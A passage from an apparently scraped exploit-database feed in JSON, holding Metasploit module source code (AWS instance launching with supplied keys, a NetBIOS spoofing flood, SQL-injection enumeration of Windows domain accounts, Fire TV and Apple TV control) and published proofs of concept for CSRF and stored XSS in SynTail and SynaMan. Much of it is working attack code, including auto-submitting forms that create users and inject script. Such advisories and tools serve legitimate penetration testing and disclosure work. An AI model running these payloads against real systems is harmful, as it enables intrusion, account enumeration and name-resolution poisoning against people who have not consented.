deregister_options('VHOST')\n end\n\n def run\n if datastore['AccessKeyId'].blank? || datastore['SecretAccessKey'].blank?\n print_error(\"Both AccessKeyId and SecretAccessKey are required\")\n return\n end\n # setup creds for making IAM API calls\n creds = {\n 'AccessKeyId' => datastore['AccessKeyId'],\n 'SecretAccessKey' => datastore['SecretAccessKey']\n }\n creds['Token'] = datastore['Token'] unless datastore['Token'].blank?\n\n create_keypair(creds) unless datastore['SSH_PUB_KEY'].blank?\n vpc = datastore['VPC_ID'].blank? ? vpc(creds) : datastore['VPC_ID']\n sg = datastore['SEC_GROUP_ID'].blank? ? create_sg(creds, vpc) : datastore['SEC_GROUP_ID']\n subnet = datastore['SUBNET_ID'].blank? ? pub_subnet(creds, vpc) : datastore['SUBNET_ID']\n unless subnet\n print_error(\"Could not find a public subnet, please provide one\")\n return\n end\n instance_id = launch_instance(creds, subnet, sg)\n action = 'DescribeInstances'\n doc = call_ec2(creds, 'Action' => action, 'InstanceId.1' => instance_id)\n doc = print_results(doc, action)\n begin\n # need a better parser so we can avoid shit like this\n ip = doc['reservationSet']['item']['instancesSet']['item']['networkInterfaceSet']['item']['privateIpAddressesSet']['item']['association']['publicIp']\n print_status(\"Instance #{instance_id} has IP adrress #{ip}\")\n rescue NoMethodError\n print_error(\"Could not retrieve instance IP address\")\n end\n end\n\n def opts(action, subnet, sg)\n opts = {\n 'Action' => action,\n 'ImageId' => datastore['AMI_ID'],\n 'KeyName' => datastore['KEY_NAME'],\n 'InstanceType' => datastore['INSTANCE_TYPE'],\n 'NetworkInterface.1.SubnetId' => subnet,\n 'NetworkInterface.1.SecurityGroupId.1' => sg,\n 'MinCount' => datastore['MinCount'].to_s,\n 'MaxCount' => datastore['MaxCount'].to_s,\n 'NetworkInterface.1.AssociatePublicIpAddress' => 'true',\n 'NetworkInterface.1.DeviceIndex' => '0'\n }\n opts['IamInstanceProfile.Name'] = datastore['ROLE_NAME'] unless datastore['ROLE_NAME'].blank?\n unless datastore['USERDATA_FILE'].blank?\n if File.exist?(datastore['USERDATA_FILE'])\n opts['UserData'] = URI.encode(Base64.encode64(open(datastore['USERDATA_FILE'], 'r').read).strip)\n else\n print_error(\"Could not open userdata file: #{datastore['USERDATA_FILE']}\")\n end\n end\n opts\n end\n\n def launch_instance(creds, subnet, sg)\n action = 'RunInstances'\n print_status(\"Launching instance(s) in #{datastore['Region']}, AMI: #{datastore['AMI_ID']}, key pair name: #{datastore['KEY_NAME']}, security group: #{sg}, subnet ID: #{subnet}\")\n doc = call_ec2(creds, opts(action, subnet, sg))\n doc = print_results(doc, action)\n return if doc.nil?\n # TODO: account for multiple instances\n if doc['instancesSet']['item'].instance_of?(Array)\n instance_id = doc['instancesSet']['item'].first['instanceId']\n else\n instance_id = doc['instancesSet']['item']['instanceId']\n end\n print_status(\"Launched instance #{instance_id} in #{datastore['Region']} account #{doc['ownerId']}\")\n action = 'DescribeInstanceStatus'\n loop do\n sleep(15)\n doc = call_ec2(creds, 'Action' => action, 'InstanceId' => instance_id)\n doc = print_results(doc, action)\n if doc ['instanceStatusSet'].nil?\n print_error(\"Error, could not get instance status, instance possibly terminated\")\n break\n end\n status = doc['instanceStatusSet']['item']['systemStatus']['status']\n print_status(\"instance #{instance_id} status: #{status}\")\n break if status == 'ok' || status != 'initializing'\n end\n instance_id\n end\n\n def create_keypair(creds)\n action = 'ImportKeyPair'\n doc = call_ec2(creds, 'Action' => action, 'KeyName' => datastore['KEY_NAME'], 'PublicKeyMaterial' => Rex::Text.encode_base64(datastore['SSH_PUB_KEY']))\n if doc['Response'].nil?\n doc = print_results(doc, action)\n if doc['keyName'].nil? || doc['keyFingerprint'].nil?\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n else\n print_status(\"Created #{doc['keyName']} (#{doc['keyFingerprint']})\")\n end\n else\n if doc['Response']['Errors'] && doc['Response']['Errors']['Error']\n print_error(doc['Response']['Errors']['Error']['Message'])\n else\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n end\n end\n end\n\n def pub_subnet(creds, vpc_id)\n # First look for subnets that are configured to provision a public IP when instances are launched\n action = 'DescribeSubnets'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_subnets = doc['subnetSet']['item'].select { |x| x['vpcId'] == vpc_id }\n pub_subnets = vpc_subnets.select { |x| x['mapPublicIpOnLaunch'] == 'true' }\n return pub_subnets.first['subnetId'] if pub_subnets.count > 0\n\n # Second, try to retrieve public subnet id by looking through route tables to find subnets\n # associated with an Internet gateway\n action = 'DescribeRouteTables'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_route_table = doc['routeTableSet']['item'].select { |x| x['vpcId'] == vpc_id }\n vpc_route_table.each do |route_table|\n next if route_table['associationSet'].nil? || route_table['routeSet'].nil?\n entries = route_table['routeSet']['item']\n if entries.instance_of?(Hash)\n if entries['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n else\n route_table['routeSet']['item'].each do |route|\n if route['gatewayId'] && route['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n end\n end\n end\n nil\n end\n\n def create_sg(creds, vpc_id)\n name = Rex::Text.rand_text_alphanumeric(8)\n action = 'CreateSecurityGroup'\n doc = call_ec2(creds, 'Action' => action, 'GroupName' => name, 'VpcId' => vpc_id, 'GroupDescription' => name)\n doc = print_results(doc, action)\n print_error(\"Could not create SG\") && return if doc['groupId'].nil?\n sg = doc['groupId']\n proto, port = datastore['SEC_GROUP_PORT'].split(':')\n cidr = URI.encode(datastore['SEC_GROUP_CIDR'])\n action = 'AuthorizeSecurityGroupIngress'\n doc = call_ec2(creds, 'Action' => action,\n 'IpPermissions.1.IpRanges.1.CidrIp' => cidr,\n 'IpPermissions.1.IpProtocol' => proto,\n 'IpPermissions.1.FromPort' => port,\n 'IpPermissions.1.ToPort' => port,\n 'GroupId' => sg)\n doc = print_results(doc, action)\n if doc['return'] && doc['return'] == 'true'\n print_status(\"Created security group: #{sg}\")\n else\n print_error(\"Failed creating security group\")\n end\n sg\n end\n\n def vpc(creds)\n action = 'DescribeVpcs'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n if doc['vpcSet'].nil? || doc['vpcSet']['item'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n return nil\n end\n item = doc['vpcSet']['item']\n return item['vpcId'] if item.instance_of?(Hash)\n return item.first['vpcId'] if item.instance_of?(Array) && !item.first['vpcId'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n nil\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/aws/aws_launch_instances.rb"}, {"lastseen": "2019-10-13T19:56:59", "bulletinFamily": "exploit", "description": "This module continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed local networks, the PPSRATE value should be increased to speed up this attack. As an example, a value of around 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup. Distant targets may require more time and lower rates for a successful attack.\n", "modified": "2017-07-24T13:26:21", "published": "2016-06-19T18:36:39", "id": "MSF:AUXILIARY/ADMIN/NETBIOS/NETBIOS_SPOOF", "href": "", "type": "metasploit", "title": "NetBIOS Response Brute Force Spoof (Direct)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n\n def initialize\n super(\n 'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',\n 'Description' => %q{\n This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.\n },\n 'Author' => [\n 'vvalien', # Metasploit Module (post)\n 'hdm', # Metasploit Module\n 'tombkeeper' # Related Work\n ],\n 'License' => MSF_LICENSE,\n )\n\n register_options(\n [\n Opt::RPORT(137),\n OptString.new('NBNAME', [ true, \"The NetBIOS name to spoof a reply for\", 'WPAD' ]),\n OptAddress.new('NBADDR', [ true, \"The address that the NetBIOS name should resolve to\", Rex::Socket.source_address(\"50.50.50.50\") ]),\n OptInt.new('PPSRATE', [ true, \"The rate at which to send NetBIOS replies\", 1_000])\n ],\n self.class\n )\n end\n\n def netbios_spam\n payload =\n \"\\xff\\xff\" + # TX ID (will brute force this)\n \"\\x85\\x00\" + # Flags = response + authoratative + recursion desired\n \"\\x00\\x00\" + # Questions = 0\n \"\\x00\\x01\" + # Answer RRs = 1\n \"\\x00\\x00\" + # Authority RRs = 0\n \"\\x00\\x00\" + # Additional RRs = 0\n \"\\x20\" +\n Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack(\"A15\") + \"\\x00\" ) +\n \"\\x00\" +\n \"\\x00\\x20\" + # Type = NB\n \"\\x00\\x01\" + # Class = IN\n \"\\x00\\x04\\x93\\xe0\" + # TTL long time\n \"\\x00\\x06\" + # Datalength = 6\n \"\\x00\\x00\" + # Flags B-node, unique\n Rex::Socket.addr_aton(@fake_addr)\n\n stime = Time.now.to_f\n pcnt = 0\n pps = 0\n\n print_status(\"Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...\")\n\n live = true\n while live\n 0.upto(65535) do |txid|\n begin\n payload[0,2] = [txid].pack(\"n\")\n @sock.put(payload)\n pcnt += 1\n\n pps = (pcnt / (Time.now.to_f - stime)).to_i\n if pps > @targ_rate\n sleep(0.01)\n end\n rescue Errno::ECONNREFUSED\n print_error(\"Error: Target sent us an ICMP port unreachable, port is likely closed\")\n live = false\n break\n end\n end\n end\n\n print_status(\"Cleaning up...\")\n end\n\n def run\n connect_udp\n @sock = self.udp_sock\n\n @targ_addr = rhost\n @targ_port = rport\n @targ_rate = datastore['PPSRATE']\n @fake_name = datastore['NBNAME']\n @fake_addr = datastore['NBADDR']\n\n netbios_spam\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/netbios/netbios_spoof.rb"}, {"lastseen": "2019-11-27T19:22:14", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for the Amazon Fire TV's YouTube app. Tested on the Amazon Fire TV Stick.\n", "modified": "2017-07-24T13:26:21", "published": "2015-02-17T11:44:04", "id": "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "href": "", "type": "metasploit", "title": "Amazon Fire TV YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Amazon Fire TV YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],\n ['URL', 'http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n case action.name\n when 'Play'\n stop\n sleep(1)\n res = play\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{datastore['VID']}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error(\"Couldn't #{action.name.downcase} video\")\n end\n end\n\n def play\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'ctype' => 'text/plain',\n 'vars_post' => {\n 'v' => datastore['VID']\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube/run'\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/firetv/firetv_youtube.rb"}, {"lastseen": "2019-10-01T16:08:47", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSER_SNAME function via Error Based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-25T15:57:20", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_DOMAIN_ACCOUNTS_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration',\n 'Description' => %q{\n This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n },\n 'Author' =>\n [\n 'nullbind <scott.sutherland[at]netspi.com>',\n 'antti <antti.rantasaari[at]netspi.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [[ 'URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('START_RID', [true, 'RID to start fuzzing at.', 500]),\n OptInt.new('END_RID', [true, 'RID to stop fuzzing at.', 3000])\n ])\n end\n\n def run\n print_status(\"Grabbing the SQL Server name and domain...\")\n db_server_name = get_server_name\n if db_server_name.nil?\n print_error(\"Unable to grab the server name\")\n return\n else\n print_good(\"Server name: #{db_server_name}\")\n end\n\n db_domain_name = get_domain_name\n if db_domain_name.nil?\n print_error(\"Unable to grab domain name\")\n return\n end\n\n # Check if server is on a domain\n if db_server_name == db_domain_name\n print_error(\"The SQL Server does not appear to be part of a Windows domain\")\n return\n else\n print_good(\"Domain name: #{db_domain_name}\")\n end\n\n print_status(\"Grabbing the SID for the domain...\")\n windows_domain_sid = get_windows_domain_sid(db_domain_name)\n if windows_domain_sid.nil?\n print_error(\"Could not recover the SQL Server's domain sid.\")\n return\n else\n print_good(\"Domain sid: #{windows_domain_sid}\")\n end\n\n # Get a list of windows users, groups, and computer accounts using SUSER_NAME()\n total_rids = datastore['END_RID'] - datastore['START_RID']\n print_status(\"Brute forcing #{total_rids} RIDs via SQL injection, be patient...\")\n domain_users = get_win_domain_users(windows_domain_sid)\n if domain_users.nil?\n print_error(\"Sorry, no Windows domain accounts were found, or DC could not be contacted.\")\n return\n end\n\n # Print number of objects found and write to a file\n print_good(\"#{domain_users.length} user accounts, groups, and computer accounts were found.\")\n\n # Create table for report\n windows_domain_login_table = Rex::Text::Table.new(\n 'Header' => 'Windows Domain Accounts',\n 'Ident' => 1,\n 'Columns' => ['name']\n )\n\n # Add brute forced names to table\n domain_users.each do |object_name|\n windows_domain_login_table << [object_name]\n end\n\n print_line(windows_domain_login_table.to_s)\n\n # Create output file\n filename= \"#{datastore['RHOST']}-#{datastore['RPORT']}_windows_domain_accounts.csv\"\n path = store_loot(\n 'mssql.domain.accounts',\n 'text/plain',\n datastore['RHOST'],\n windows_domain_login_table.to_csv,\n filename,\n 'SQL Server query results'\n )\n print_status(\"Query results have been saved to: #{path}\")\n end\n\n # Get the server name\n def get_server_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+@@servername+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n instance_name = $1\n sql_server_name = instance_name.split('\\\\')[0]\n else\n sql_server_name = nil\n end\n\n sql_server_name\n end\n\n # Get the domain name of the SQL Server\n def get_domain_name\n clue_start = Rex::Text.rand_text_alpha(8 + rand(4))\n clue_end = Rex::Text.rand_text_alpha(8 + rand(4))\n sql = \"(select '#{clue_start}'+DEFAULT_DOMAIN()+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n domain_name = $1\n else\n domain_name = nil\n end\n\n domain_name\n end\n\n # Get the SID for the domain\n def get_windows_domain_sid(db_domain_name)\n domain_group = \"#{db_domain_name}\\\\Domain Admins\"\n\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n sql = \"(select cast('#{clue_start}'+(select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('#{domain_group}')))), 1, 2, ''))+'#{clue_end}' as int))\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n object_sid = $1\n domain_sid = object_sid[0..47]\n return nil if domain_sid.empty?\n else\n domain_sid = nil\n end\n\n domain_sid\n end\n\n # Get list of windows accounts, groups and computer accounts\n def get_win_domain_users(domain_sid)\n clue_start = Rex::Text.rand_text_alpha(8)\n clue_end = Rex::Text.rand_text_alpha(8)\n\n windows_logins = []\n\n total_rids = datastore['END_RID'] - datastore['START_RID']\n # Fuzz the principal_id parameter (RID in this case) passed to the SUSER_NAME function\n (datastore['START_RID']..datastore['END_RID']).each do |principal_id|\n rid_diff = principal_id - datastore['START_RID']\n if principal_id % 100 == 0\n print_status(\"#{rid_diff} of #{total_rids } RID queries complete\")\n end\n\n user_sid = build_user_sid(domain_sid, principal_id)\n\n # Return if sid does not resolve correctly for a domain\n if user_sid.length < 48\n return nil\n end\n\n sql = \"(SELECT '#{clue_start}'+(SELECT SUSER_SNAME(#{user_sid}) as name)+'#{clue_end}')\"\n\n result = mssql_query(sql)\n\n if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/\n windows_login = $1\n\n unless windows_login.empty? || windows_logins.include?(windows_login)\n windows_logins.push(windows_login)\n print_good(\" #{windows_login}\")\n end\n end\n\n end\n\n windows_logins\n end\n\n def build_user_sid(domain_sid, rid)\n # Convert number to hex and fix order\n principal_id = \"%02X\" % rid\n principal_id = principal_id.size.even? ? principal_id : \"0#{principal_id}\"\n principal_id = principal_id.scan(/(..)/).reverse.join\n # Add padding\n principal_id = principal_id.ljust(8, '0')\n\n # Create full sid\n \"0x#{domain_sid}#{principal_id}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb"}, {"lastseen": "2019-11-22T17:14:51", "bulletinFamily": "exploit", "description": "This module will show an image on an AppleTV device for a period of time. Some AppleTV devices are actually password-protected, in that case please set the PASSWORD datastore option. For password brute forcing, please see the module auxiliary/scanner/http/appletv_login.\n", "modified": "2017-07-24T13:26:21", "published": "2014-08-25T20:24:41", "id": "MSF:AUXILIARY/ADMIN/APPLETV/APPLETV_DISPLAY_IMAGE", "href": "", "type": "metasploit", "title": "Apple TV Image Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple TV Image Remote Control',\n 'Description' => %q(\n This module will show an image on an AppleTV device for a period of time.\n Some AppleTV devices are actually password-protected, in that case please\n set the PASSWORD datastore option. For password brute forcing, please see\n the module auxiliary/scanner/http/appletv_login.\n ),\n 'Author' =>\n [\n '0a29406d9794e4f9b30b3c5d6702c708', # Original work\n 'sinn3r' # You can blame me for mistakes\n ],\n 'References' =>\n [\n ['URL', 'http://nto.github.io/AirPlay.html']\n ],\n 'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },\n 'License' => MSF_LICENSE\n ))\n\n # Make the PASSWORD option more visible and hope the user is more aware of this option\n register_options([\n Opt::RPORT(7000),\n OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),\n OptPath.new('FILE', [true, 'Image to upload and show']),\n OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])\n ])\n\n # We're not actually using any of these against AppleTV in our Rex HTTP client init,\n # so deregister them so we don't overwhelm the user with fake options.\n deregister_options(\n 'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',\n 'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',\n 'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',\n 'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',\n 'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',\n 'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',\n 'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',\n 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',\n 'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'\n )\n end\n\n\n #\n # Sends an image request to AppleTV. HttpClient isn't used because we actually need to keep\n # the connection alive so that the video can keep playing.\n #\n def send_image_request(opts)\n http = nil\n\n http = Rex::Proto::Http::Client.new(\n rhost,\n rport.to_i,\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n },\n ssl,\n ssl_version,\n proxies,\n datastore['HttpUsername'],\n datastore['HttpPassword']\n )\n add_socket(http)\n\n http.set_config('agent' => datastore['UserAgent'])\n\n req = http.request_raw(opts)\n res = http.send_recv(req)\n\n Rex.sleep(datastore['TIME']) if res.code == 200\n http.close\n\n res\n end\n\n\n def get_image_data\n File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }\n end\n\n\n def show_image\n image = get_image_data\n\n opts = {\n 'method' => 'PUT',\n 'uri' => '/photo',\n 'data' => image\n }\n\n res = send_image_request(opts)\n\n if !res\n print_status(\"The connection timed out\")\n elsif res.code == 200\n print_status(\"Received HTTP 200\")\n else\n print_error(\"The request failed due to an unknown reason\")\n end\n end\n\n\n def run\n print_status(\"Image request sent. Duration set: #{datastore['TIME']} seconds\")\n show_image\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/appletv/appletv_display_image.rb"}], "zdt": [{"lastseen": "2018-04-05T21:46:10", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-05-09T00:00:00", "published": "2015-05-09T00:00:00", "id": "1337DAY-ID-23612", "href": "https://0day.today/exploit/description/23612", "type": "zdt", "title": "SynTail 1.5 Build 566 - CSRF / XSS Vulnerabilities", "sourceData": "# Exploit Title: Multiple vulnerabilities in SynTail 1.5 Build 566 (CSRF/Stored XSS)\r\n# Date: 07-05-2015\r\n# Exploit Author: Marlow Tannhauser\r\n# Contact: [email\u00a0protected]\r\n# Vendor Homepage: http://www.synametrics.com\r\n# Software Link: http://web.synametrics.com/SynTailDownload.htm\r\n# Version: 1.5 Build 566. Earlier versions may also be affected.\r\n# CVE: 2015-3140\r\n# Category: Web apps\r\n \r\n \r\n# DISCLOSURE TIMELINE #\r\n08/02/2015: Initial disclosure to vendor and CERT\r\n09/02/2015: Acknowledgment of vulnerabilities from vendor\r\n11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor\r\n19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request\r\n09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request\r\n20/04/2015: Confirmation of fix from vendor\r\n07/05/2015: Disclosure\r\n \r\nNote that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.\r\n \r\n \r\n# EXPLOIT DESCRIPTION #\r\nSynTail 1.5 Build 566 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.\r\n \r\n \r\n# POC 1 #\r\nThe following PoC uses the CSRF vulnerability to create a new file bundle, and combines it with one of the stored XSS vulnerabilities\r\n \r\n<html>\r\n<body>\r\n<form name=\"evilform\" method=\"post\" action=\"http://192.168.0.8:9555/app\">\r\n<input type=\"hidden\" name=\"friendlyName\" value=\"<script>alert(\"Marlow\")</script> />\r\n<input type=\"hidden\" name=\"selectedPath\" value=\"/home/\" />\r\n<input type=\"hidden\" name=\"showFiles\" value=\"true\" />\r\n<input type=\"hidden\" name=\"st\" value=\"addfb\" />\r\n<input type=\"hidden\" name=\"operation\" value=\"mngFB\" />\r\n</form>\r\n<script type=\"text/javascript\">\r\ndocument.evilform.submit();\r\n</script>\r\n</body>\r\n</html> \r\n \r\n \r\n# POC 2 #\r\nThe following PoC uses the CSRF vulnerability to create a new user with the details shown\r\n \r\n<html>\r\n<body>\r\n<form name=\"evilform\" method=\"post\" action=\"http://192.168.1.245:9555/app?operation=mngUsers\">\r\n<input type=\"hidden\" name=\"fullName\" value=\"marlow\" />\r\n<input type=\"hidden\" name=\"email\" value=\"[email\u00a0protected]\" />\r\n<input type=\"hidden\" name=\"password\" value=\"marlow\" />\r\n<input type=\"hidden\" name=\"showFiles\" value=\"true\" />\r\n<input type=\"hidden\" name=\"st\" value=\"addfb\" />\r\n<input type=\"hidden\" name=\"operation\" value=\"mngUsers\" />\r\n</form>\r\n<script type=\"text/javascript\">\r\ndocument.evilform.submit();\r\n</script>\r\n</body>\r\n</html> \r\n \r\n \r\n# STORED XSS VULNERABILITIES #\r\nStored XSS vulnerabilities are present in the following fields:\r\n \r\nManage Users > Create a new user > Full name field and Email field\r\nExample URL: POST request\r\n \r\nManage file bundles > Create a new file bundle > Friendly name field and File path field\r\nExample URL: POST request\r\n \r\n \r\n# MITIGATION #\r\nUpgrade to the latest build of SynTail, available from the link shown.\n\n# 0day.today [2018-04-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23612"}, {"lastseen": "2018-01-04T23:22:49", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2015-05-09T00:00:00", "published": "2015-05-09T00:00:00", "id": "1337DAY-ID-23613", "href": "https://0day.today/exploit/description/23613", "type": "zdt", "title": "SynaMan 3.4 Build 1436 - CSRF / XSS Vulnerabilities", "sourceData": "# Exploit Title: Multiple vulnerabilities in SynaMan 3.4 Build 1436 (CSRF/Stored XSS)\r\n# Date: 07-05-2015\r\n# Exploit Author: Marlow Tannhauser\r\n# Contact: [email\u00a0protected]\r\n# Vendor Homepage: http://www.synametrics.com\r\n# Software Link: http://web.synametrics.com/SynaManDownload.htm\r\n# Version: 3.4 Build 1436. Earlier versions may also be affected.\r\n# CVE: 2015-3140\r\n# Category: Web apps\r\n \r\n \r\n# DISCLOSURE TIMELINE #\r\n08/02/2015: Initial disclosure to vendor and CERT\r\n09/02/2015: Acknowledgment of vulnerabilities from vendor\r\n11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor\r\n19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request\r\n09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request\r\n20/04/2015: Confirmation of fix from vendor\r\n07/05/2015: Disclosure\r\n \r\nNote that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.\r\n \r\n \r\n# EXPLOIT DESCRIPTION #\r\nSynaMan 3.4 Build 1436 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.\r\n \r\n \r\n# POC 1 #\r\nThe following PoC uses the CSRF vulnerability together with one of the stored XSS vulnerabilities, to create a new shared folder in the application.\r\n \r\n<html>\r\n<img src=\"http://192.168.0.8:6060/app?sharedName=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&selectedPath=C%3A\\&publicRead=1&publicWrite=1&operation=mngFolders&st=addFolder\" alt=\"\" 